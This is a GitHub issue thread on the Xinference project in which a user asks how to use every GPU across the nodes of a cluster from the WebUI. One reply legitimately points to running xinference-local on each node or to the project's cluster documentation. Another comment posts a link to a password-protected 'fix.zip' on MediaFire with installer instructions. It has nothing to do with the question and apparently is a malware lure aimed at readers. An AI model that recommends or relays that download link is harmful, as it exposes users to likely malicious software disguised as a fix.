### ISSUE TITLE
如何通过WebUI使用集群中所有节点的所有GPU

### ISSUE THREAD

**Issue by Renoshen** [xorbitsai/inference#2164]
### System Info / 系統信息

CUDA 12.4

### Running Xinference with Docker? / 是否使用 Docker 运行 Xinfernece？

- [ ] docker / docker
- [X] pip install / 通过 pip install 安装
- [ ] installation from source / 从源码安装

### Version info / 版本信息

0.14.3

### The command used to start Xinference / 用以启动 xinference 的命令

 HF_ENDPOINT=https://hf-mirror.com XINFERENCE_HOME=/data/xindata xinference-local --host 0.0.0.0 --port 9997

### Reproduction / 复现过程

不属于BUG

### Expected behavior / 期待表现

得到答案。

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Valdanitooooo** [comment]
可以在每个节点跑个 xinference-local 
也可以跑个集群，参考文档 https://inference.readthedocs.io/zh-cn/latest/getting_started/using_xinference.html#deploy-xinference-in-a-cluster
